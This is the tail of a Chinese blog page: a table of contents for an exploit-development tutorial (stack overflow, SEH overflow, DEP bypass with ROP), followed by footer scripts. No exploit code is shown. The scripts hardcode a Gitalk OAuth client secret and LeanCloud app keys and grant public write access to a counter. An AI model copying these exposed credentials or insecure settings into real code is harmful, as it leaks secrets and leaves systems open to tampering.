<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-漏洞利用开发简介"><span class="nav-text">0x00 漏洞利用开发简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-简单栈溢出"><span class="nav-text">0x01 简单栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞点"><span class="nav-text">漏洞点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关闭防御措施"><span class="nav-text">关闭防御措施</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#整体的攻击流程"><span class="nav-text">整体的攻击流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找jmp-esp跳板"><span class="nav-text">寻找jmp esp跳板</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-基于SEH的栈溢出"><span class="nav-text">0x02 基于SEH的栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置-1"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找PPR"><span class="nav-text">寻找PPR</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-1"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-绕过DEP"><span class="nav-text">0x03 绕过DEP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#设置DEP保护"><span class="nav-text">设置DEP保护</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#计算偏移量"><span class="nav-text">计算偏移量</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#创建ROP链"><span class="nav-text">创建ROP链</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-2"><span class="nav-text">自动化攻击</span></a></li></ol></li></ol></div>
|
||
|
||
|
||
</div>
|
||
</section>
|
||
<!--/noindex-->
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</aside>
|
||
|
||
|
||
|
||
</div>
|
||
</main>
|
||
|
||
<footer id="footer" class="footer">
|
||
<div class="footer-inner">
|
||
<div class="copyright">© 2019 — <span itemprop="copyrightYear">2021</span>
|
||
<span class="with-love">
|
||
<i class="fa fa-user"></i>
|
||
</span>
|
||
<span class="author" itemprop="copyrightHolder">Cool-Y</span>
|
||
|
||
|
||
<span class="post-meta-divider">|</span>
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-area-chart"></i>
|
||
</span>
|
||
|
||
<span title="Site words total count">105.1k</span>
|
||
|
||
</div>
|
||
|
||
|
||
<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div class="busuanzi-count">
|
||
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
|
||
|
||
|
||
<span class="site-uv">
|
||
<i class="fa fa-user"></i>
|
||
<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
|
||
|
||
</span>
|
||
|
||
|
||
|
||
<span class="site-pv">
|
||
<i class="fa fa-eye"></i>
|
||
<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
|
||
|
||
</span>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</footer>
|
||
|
||
|
||
<div class="back-to-top">
|
||
<i class="fa fa-arrow-up"></i>
|
||
|
||
<span id="scrollpercent"><span>0</span>%</span>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
<div id="needsharebutton-float">
|
||
<span class="btn">
|
||
<i class="fa fa-share-alt" aria-hidden="true"></i>
|
||
</span>
|
||
</div>
|
||
|
||
|
||
</div>
|
||
|
||
|
||
|
||
<script type="text/javascript">
|
||
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
|
||
window.Promise = null;
|
||
}
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
|
||
|
||
<script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
|
||
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<!-- LOCAL: You can save these files to your site and update links -->
|
||
|
||
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
|
||
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
|
||
<!-- END LOCAL -->
|
||
|
||
|
||
<script type="text/javascript">
|
||
function renderGitalk(){
|
||
var gitalk = new Gitalk({
|
||
owner: 'Cool-Y',
|
||
repo: 'gitment-comments',
|
||
clientID: '180955a2c3ae3d966d9a',
|
||
clientSecret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
|
||
admin: 'Cool-Y',
|
||
id: decodeURI(location.pathname),
|
||
|
||
distractionFreeMode: 'true'
|
||
|
||
});
|
||
gitalk.render('gitalk-container');
|
||
}
|
||
renderGitalk();
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
|
||
<script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
|
||
<script>
|
||
function showTime(Counter) {
|
||
var query = new AV.Query(Counter);
|
||
var entries = [];
|
||
var $visitors = $(".leancloud_visitors");
|
||
|
||
$visitors.each(function () {
|
||
entries.push( $(this).attr("id").trim() );
|
||
});
|
||
|
||
query.containedIn('url', entries);
|
||
query.find()
|
||
.done(function (results) {
|
||
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
|
||
|
||
if (results.length === 0) {
|
||
$visitors.find(COUNT_CONTAINER_REF).text(0);
|
||
return;
|
||
}
|
||
|
||
for (var i = 0; i < results.length; i++) {
|
||
var item = results[i];
|
||
var url = item.get('url');
|
||
var time = item.get('time');
|
||
var element = document.getElementById(url);
|
||
|
||
$(element).find(COUNT_CONTAINER_REF).text(time);
|
||
}
|
||
for(var i = 0; i < entries.length; i++) {
|
||
var url = entries[i];
|
||
var element = document.getElementById(url);
|
||
var countSpan = $(element).find(COUNT_CONTAINER_REF);
|
||
if( countSpan.text() == '') {
|
||
countSpan.text(0);
|
||
}
|
||
}
|
||
})
|
||
.fail(function (object, error) {
|
||
console.log("Error: " + error.code + " " + error.message);
|
||
});
|
||
}
|
||
|
||
function addCount(Counter) {
|
||
var $visitors = $(".leancloud_visitors");
|
||
var url = $visitors.attr('id').trim();
|
||
var title = $visitors.attr('data-flag-title').trim();
|
||
var query = new AV.Query(Counter);
|
||
|
||
query.equalTo("url", url);
|
||
query.find({
|
||
success: function(results) {
|
||
if (results.length > 0) {
|
||
var counter = results[0];
|
||
counter.fetchWhenSave(true);
|
||
counter.increment("time");
|
||
counter.save(null, {
|
||
success: function(counter) {
|
||
var $element = $(document.getElementById(url));
|
||
$element.find('.leancloud-visitors-count').text(counter.get('time'));
|
||
},
|
||
error: function(counter, error) {
|
||
console.log('Failed to save Visitor num, with error message: ' + error.message);
|
||
}
|
||
});
|
||
} else {
|
||
var newcounter = new Counter();
|
||
/* Set ACL */
|
||
var acl = new AV.ACL();
|
||
acl.setPublicReadAccess(true);
|
||
acl.setPublicWriteAccess(true);
|
||
newcounter.setACL(acl);
|
||
/* End Set ACL */
|
||
newcounter.set("title", title);
|
||
newcounter.set("url", url);
|
||
newcounter.set("time", 1);
|
||
newcounter.save(null, {
|
||
success: function(newcounter) {
|
||
var $element = $(document.getElementById(url));
|
||
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
|
||
},
|
||
error: function(newcounter, error) {
|
||
console.log('Failed to create');
|
||
}
|
||
});
|
||
}
|
||
},
|
||
error: function(error) {
|
||
console.log('Error:' + error.code + " " + error.message);
|
||
}
|
||
});
|
||
}
|
||
|
||
$(function() {
|
||
var Counter = AV.Object.extend("Counter");
|
||
if ($('.leancloud_visitors').length == 1) {
|
||
addCount(Counter);
|
||
} else if ($('.post-title-link').length > 1) {
|
||
showTime(Counter);
|
||
}
|
||
});
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script>
|
||
(function(){
|
||
var bp = document.createElement('script');
|
||
var curProtocol = window.location.protocol.split(':')[0];
|
||
if (curProtocol === 'https') {
|
||
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
|
||
}
|
||
else {
|
||
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
|
||
}
|
||
var s = document.getElementsByTagName("script")[0];
|
||
s.parentNode.insertBefore(bp, s);
|
||
})();
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
<link rel="stylesheet" href="/lib/needsharebutton/needsharebutton.css">
|
||
|
||
|
||
|
||
<script src="/lib/needsharebutton/needsharebutton.js"></script>
|
||
|
||
<script>
|
||
|
||
pbOptions = {};
|
||
|
||
pbOptions.iconStyle = "box";
|
||
|
||
pbOptions.boxForm = "horizontal";
|
||
|
||
pbOptions.position = "bottomCenter";
|
||
|
||
pbOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
|
||
|
||
new needShareButton('#needsharebutton-postbottom', pbOptions);
|
||
|
||
|
||
flOptions = {};
|
||
|
||
flOptions.iconStyle = "box";
|
||
|
||
flOptions.boxForm = "horizontal";
|
||
|
||
flOptions.position = "middleRight";
|
||
|
||
flOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
|
||
|
||
new needShareButton('#needsharebutton-float', flOptions);
|
||
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/js/src/js.cookie.js?v=5.1.4"></script>
|
||
<script type="text/javascript" src="/js/src/scroll-cookie.js?v=5.1.4"></script>
|
||
|
||
|
||
|
||
|
||
</body>
|
||
</html>
|